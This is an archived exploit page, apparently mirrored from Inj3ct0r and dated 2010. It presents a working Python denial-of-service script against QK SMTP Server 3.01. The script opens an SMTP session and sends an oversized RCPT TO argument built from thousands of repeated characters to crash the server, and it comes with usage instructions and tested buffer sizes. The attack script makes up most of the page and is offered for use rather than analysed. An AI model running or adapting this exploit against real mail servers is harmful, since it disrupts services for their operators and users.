Home / os / win7

QK SMTP Server 3 RCPT TO: Command DoS

Posted on 12 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>QK SMTP Server 3 RCPT TO: Command DoS</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================== QK SMTP Server 3 RCPT TO: Command DoS ===================================== # Author: antrhacks # Software Link: http://www.qksoft.com/qk-smtp-server/download.php # Version: 3.01 # Platform: Windows XP SP3 Home edition Fr # Tested with buffersize: 4500, 5000 # Example: ./QKsmtp.py 192.168.0.10 4500 # Nota: Settings &gt; Acces IP Control &gt; Allow your IP #!/usr/bin/python #-------------------------------------------- # QK SMTP Server 3 RCPT TO: Command DoS #-------------------------------------------- # Title: QK SMTP Server 3 RCPT TO: Command DoS # Author: antrhacks # Software Link: http://www.qksoft.com/qk-smtp-server/download.php # Version: 3.01 # Platform: Windows XP SP3 Home edition Fr # Tested with buffersize: 4500, 5000 # Example: ./QKsmtp.py 192.168.0.10 4500 # Nota: Settings &gt; Acces IP Control &gt; Allow your IP import socket import sys def howto(): print (&quot;Usage: scriptname.py &lt;IP&gt; &lt;BufferSize&gt; &quot;) def exploit(host): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((host, 25)) except: print (&quot;Unable to connect to host&quot;) sys.exit(1) r=sock.recv(1024) print r r=sock.getsockname() print r sock.send(&quot;HELO localhost &quot;) r=sock.recv(1024) print r sock.send(&quot;MAIL FROM: hack@hack.com &quot;) r=sock.recv(1024) print r sock.send(&quot;RCPT TO: &quot; + buffere + &quot; &quot;) r=sock.recv(1024) print r sock.send(&quot;QUIT&quot; + &quot; &quot;) r=sock.recv(1024) print r sock.close() if len(sys.argv) &lt;&gt; 3: howto() sys.exit(1) else: host=sys.argv[1] buffersize=int(sys.argv[2]) buffere= &quot;x41&quot; * buffersize exploit(host) sys.exit(0) # END # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-12]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP